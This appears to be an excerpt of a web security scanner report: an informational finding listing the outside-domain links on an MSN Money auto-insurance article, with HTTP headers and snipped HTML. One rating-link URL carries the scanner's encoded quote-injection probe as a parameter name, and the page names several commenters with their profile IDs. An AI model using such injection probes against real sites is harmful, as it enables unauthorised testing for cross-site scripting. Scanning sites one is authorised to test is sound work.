http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://us.social.s-msn.com/s/images/bluemannxl.png
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=Does+auto+insurance+cover+the+car+or+the+person&form=money3
http://www.bing.com/search?q=Does+car+insurance+lower+at+a+certain+age&form=money3
http://www.bing.com/search?q=Ophiuchus+Horoscope&form=MSMONY
http://www.bing.com/search?q=Virgo+Horoscope&FORM=MSMONY
http://www.bing.com/search?q=What+car+is+considered+high+risk+on+auto+insurance&form=money3
http://www.bing.com/search?q=What+happens+if+I+have+an+accident+and+no+car+insurance%3F&form=money3
http://www.bing.com/search?q=allstate+insurance&FORM=MSMONY
http://www.bing.com/search?q=scorpio+Horoscope&form=MSMONY
http://www.bing.com/search?q=what+is+gap+insurance&form=money3
http://www.bing.com/search?q=what+is+sr22+insurance&form=money3
http://www.bing.com/search?q=zodiac+calendar&form=MSMONY
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.carinsurance.com/
http://www.carinsurance.com/Articles/auto-insurance-companies-stand-out.aspx
http://www.carinsurance.com/Articles/cars-that-attract-ladies.aspx
http://www.carinsurance.com/Articles/five-most-dangerous-cars.aspx
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.insure.com/
http://www.insure.com/car-insurance/driver-distractions.html
http://www.insure.com/car-insurance/policy-save.html
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.slate.com/id/2282620?ocid=xnetr2-4
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406278&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fauto-insurance%2Farticle.aspx%3Fpost%3D7e2e7469-2f32-4c49-a3c2-54bda9bb436b%26GT1%3D33004&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=a03f55ae3d164d5598bc3697848c6072; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 16:51:18 GMT
Content-Length: 149602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406278&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fauto-insurance%2Farticle.aspx%3Fpost%3D7e2e7469-2f32-4c49-a3c2-54bda9bb436b%26GT1%3D33004&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<i> comes from Barbara Marquand at <a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/">CarInsurance.com</a>
...[SNIP]...
<p><a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/"><img src="http://media.social.s-redacted/images/blogs/00120065-0000-0000-0000-000000000000_00000065-075e-0000-0000-000000000000_20110128210926_carinsurance.com-logo.gif" alt="CarInsurance.com on MSN Money" class="imagefloatright userImage lead" /></a>In the wake of recent news that the <a href="http://www.bing.com/search?q=zodiac+calendar&form=MSMONY" title="http://www.bing.com/search?q=zodiac+calendar&form=MSMONY">zodiac calendar</a> requires updating, <a href="http://www.bing.com/search?q=allstate+insurance&FORM=MSMONY" title="http://www.bing.com/search?q=allstate+insurance&FORM=MSMONY">Allstate Insurance</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=Virgo+Horoscope&FORM=MSMONY" title="http://www.bing.com/search?q=Virgo+Horoscope&FORM=MSMONY">Virgos</a>
...[SNIP]...
<p>People born under the sign were almost seven times more likely to be in a car accident last year when compared to <a href="http://www.bing.com/search?q=scorpio+Horoscope&form=MSMONY" title="http://www.bing.com/search?q=scorpio+Horoscope&form=MSMONY">Scorpios</a>
...[SNIP]...
<p>The "new" sign, <a href="http://www.bing.com/search?q=Ophiuchus+Horoscope&form=MSMONY" title="http://www.bing.com/search?q=Ophiuchus+Horoscope&form=MSMONY">Ophiuchus</a>
...[SNIP]...
</b><a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/"><b>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/auto-insurance-companies-stand-out.aspx" title="http://www.carinsurance.com/Articles/auto-insurance-companies-stand-out.aspx">Auto insurance companies try to stand out from the crowd</a>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/five-most-dangerous-cars.aspx" title="http://www.carinsurance.com/Articles/five-most-dangerous-cars.aspx">The 5 most dangerous cars around</a>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/cars-that-attract-ladies.aspx" title="http://www.carinsurance.com/Articles/cars-that-attract-ladies.aspx">Cars that attract the ladies</a>
...[SNIP]...
ry', 'True','1');" href="http://money.msn.com/auto-insurance/article.aspx?b9684%2522a%253d%2522b%2522e6895580fdf=1&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
True','0');" href="http://money.msn.com/auto-insurance/article.aspx?b9684%2522a%253d%2522b%2522e6895580fdf=1&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XEdI4lPH5YXQoFdzX6dolUuJi4zgESkkx?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X_8ey5stO4VZuowOF1vLLqcSOHTm1zM-b?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-65309922ddd6d53b.profile.live.com/msn/posts?mkt=en-US&domain=en-US">tyler coghill</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-65309922ddd6d53b.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1mNepHp8dR3BaNz273vmz1qC7k6Dr5UxqZumLTSkdmN_tUOubTVlnmMKrArPgUcaisLvPkNqvfzjWEn0neZZmWqw" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGF82iL2owd0niRqXndlsObUL4TDaFSUS?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-a842a8a81ab60686.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Jason Halliburton
..(xBWOMPx)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-a842a8a81ab60686.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1mviPxdqnTcFn7a679zN5TVH1DDZxWNbV6WUNG3lxcobNMaiLBTOorg0uNGOOxD8cwRpSBxTa-v1hTG9p826dosA" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XjEOTPvlDhopN8tJV9ggDXge6VoBpROKr?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XDDuwokFY_SngegAzwydGUhlRy0U6SVbz?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XSJ_NuxgD9S-NsAGt9iez06YT1T3z4bIy?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XxUooOtG0aQGn7lmyRZ521lfgFNbwT85r?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XrMHqap29l6sPXPOau00RiJSjNjxfDcg2?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XVAn9safTFrPEMR0pgIqDmO_jTEmXlT_g?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-d57746aa4764d3c8.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Barbara Searles Labelle
..(law abiding631)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-d57746aa4764d3c8.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XbSfkbl2R0BF4ZqaDkpm7f95iLMWvx8bJ?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-e207b0329a76e0ad.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Someone
..(wishful45)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-e207b0329a76e0ad.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-8d30c9ab59419904.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Malcolm Walker
..(gridnight)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-8d30c9ab59419904.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1m0FdnXk-Vjv78jlRgRJo9T1sIoZzPSsi5ODGnPoiX1tRqiM-j-cc9RSyn230Rb5ItlC4mQYzpf0i3HojYGwGR0Q" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XfJjjOLLsjhdTb4kuGZBLAKdqdVvOwtuc?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XsnDaHHPT68CsmSvtVijsfPyAWKHkeltN?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X3e-um2PQYYhgl12G1OQaJcxxr5hEWRbg?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-62a22a6dc88d7132.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Bill H</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-62a22a6dc88d7132.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<div style="float:right;margin-left:100px" class="provided-by-insure"><a href="http://www.insure.com"><img src="http://moneycentral.redacted/content/data/partner-tools/auto-insurance-quotes_insure-logo.jpg" width="179" height="15" alt="insure" />
...[SNIP]...
<div class="insure-link" style="margin-right:20px; margin-top:-2px;"><a href="http://www.insure.com">Car insurance quotes</a>
...[SNIP]...
<li class="first"><a href="http://www.insure.com/car-insurance/policy-save.html"> How to save money on car insurance</a>
...[SNIP]...
<li><a href="http://www.insure.com/car-insurance/driver-distractions.html"> 10 most dangerous foods to eat while driving</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=Does+car+insurance+lower+at+a+certain+age&form=money3">Do car insurance rates fall at a certain age?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Does+auto+insurance+cover+the+car+or+the+person&form=money3">Does car insurance cover the car or the person?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+happens+if+I+have+an+accident+and+no+car+insurance%3F&form=money3">What happens if I have an accident and no car insurance?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+car+is+considered+high+risk+on+auto+insurance&form=money3">What cars are considered high risk?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+sr22+insurance&form=money3">What is an SR-22 policy?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=what+is+gap+insurance&form=money3">What is gap insurance?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.176. http://money.redacted/auto-insurance/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/auto-insurance/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/auto-insurance/article.aspx?post=7e2e7469-2f32-4c49-a3c2-54bda9bb436b&GT1=33004

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://cid-62a22a6dc88d7132.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-8d30c9ab59419904.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-a842a8a81ab60686.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-d57746aa4764d3c8.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-e207b0329a76e0ad.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-075e-0000-0000-000000000000_20110128210926_carinsurance.com-logo.gif
http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://us.social.s-msn.com/s/images/bluemannxl.png
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=Does+auto+insurance+cover+the+car+or+the+person&form=money3
http://www.bing.com/search?q=Does+car+insurance+lower+at+a+certain+age&form=money3
http://www.bing.com/search?q=Ophiuchus+Horoscope&form=MSMONY
http://www.bing.com/search?q=Virgo+Horoscope&FORM=MSMONY
http://www.bing.com/search?q=What+car+is+considered+high+risk+on+auto+insurance&form=money3
http://www.bing.com/search?q=What+happens+if+I+have+an+accident+and+no+car+insurance%3F&form=money3
http://www.bing.com/search?q=allstate+insurance&FORM=MSMONY
http://www.bing.com/search?q=scorpio+Horoscope&form=MSMONY
http://www.bing.com/search?q=what+is+gap+insurance&form=money3
http://www.bing.com/search?q=what+is+sr22+insurance&form=money3
http://www.bing.com/search?q=zodiac+calendar&form=MSMONY
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.carinsurance.com/
http://www.carinsurance.com/Articles/auto-insurance-companies-stand-out.aspx
http://www.carinsurance.com/Articles/cars-that-attract-ladies.aspx
http://www.carinsurance.com/Articles/five-most-dangerous-cars.aspx
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.insure.com/
http://www.insure.com/car-insurance/driver-distractions.html
http://www.insure.com/car-insurance/policy-save.html
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.slate.com/id/2282620?ocid=xnetr2-4
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353401&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fauto-insurance%2Farticle.aspx%3Fpost%3D7e2e7469-2f32-4c49-a3c2-54bda9bb436b%26GT1%3D33004&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:10:00 GMT
Content-Length: 148168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353401&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fauto-insurance%2Farticle.aspx%3Fpost%3D7e2e7469-2f32-4c49-a3c2-54bda9bb436b%26GT1%3D33004&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<i> comes from Barbara Marquand at <a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/">CarInsurance.com</a>
...[SNIP]...
<p><a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/"><img src="http://media.social.s-redacted/images/blogs/00120065-0000-0000-0000-000000000000_00000065-075e-0000-0000-000000000000_20110128210926_carinsurance.com-logo.gif" alt="CarInsurance.com on MSN Money" class="imagefloatright userImage lead" /></a>In the wake of recent news that the <a href="http://www.bing.com/search?q=zodiac+calendar&form=MSMONY" title="http://www.bing.com/search?q=zodiac+calendar&form=MSMONY">zodiac calendar</a> requires updating, <a href="http://www.bing.com/search?q=allstate+insurance&FORM=MSMONY" title="http://www.bing.com/search?q=allstate+insurance&FORM=MSMONY">Allstate Insurance</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=Virgo+Horoscope&FORM=MSMONY" title="http://www.bing.com/search?q=Virgo+Horoscope&FORM=MSMONY">Virgos</a>
...[SNIP]...
<p>People born under the sign were almost seven times more likely to be in a car accident last year when compared to <a href="http://www.bing.com/search?q=scorpio+Horoscope&form=MSMONY" title="http://www.bing.com/search?q=scorpio+Horoscope&form=MSMONY">Scorpios</a>
...[SNIP]...
<p>The "new" sign, <a href="http://www.bing.com/search?q=Ophiuchus+Horoscope&form=MSMONY" title="http://www.bing.com/search?q=Ophiuchus+Horoscope&form=MSMONY">Ophiuchus</a>
...[SNIP]...
</b><a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/"><b>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/auto-insurance-companies-stand-out.aspx" title="http://www.carinsurance.com/Articles/auto-insurance-companies-stand-out.aspx">Auto insurance companies try to stand out from the crowd</a>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/five-most-dangerous-cars.aspx" title="http://www.carinsurance.com/Articles/five-most-dangerous-cars.aspx">The 5 most dangerous cars around</a>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/cars-that-attract-ladies.aspx" title="http://www.carinsurance.com/Articles/cars-that-attract-ladies.aspx">Cars that attract the ladies</a>
...[SNIP]...
);" href="http://money.msn.com/auto-insurance/article.aspx?post=7e2e7469-2f32-4c49-a3c2-54bda9bb436b&GT1=33004&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
ef="http://money.redacted/auto-insurance/article.aspx?post=7e2e7469-2f32-4c49-a3c2-54bda9bb436b&GT1=33004&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGF82iL2owd0niRqXndlsObUL4TDaFSUS?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-a842a8a81ab60686.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Jason Halliburton
..(xBWOMPx)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-a842a8a81ab60686.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1mviPxdqnTcFn7a679zN5TVH1DDZxWNbV6WUNG3lxcobNMaiLBTOorg0uNGOOxD8cwRpSBxTa-v1hTG9p826dosA" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XjEOTPvlDhopN8tJV9ggDXge6VoBpROKr?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XDDuwokFY_SngegAzwydGUhlRy0U6SVbz?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XSJ_NuxgD9S-NsAGt9iez06YT1T3z4bIy?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XxUooOtG0aQGn7lmyRZ521lfgFNbwT85r?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XrMHqap29l6sPXPOau00RiJSjNjxfDcg2?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XVAn9safTFrPEMR0pgIqDmO_jTEmXlT_g?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-d57746aa4764d3c8.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Barbara Searles Labelle
..(law abiding631)
</a>
...[SNIP]...
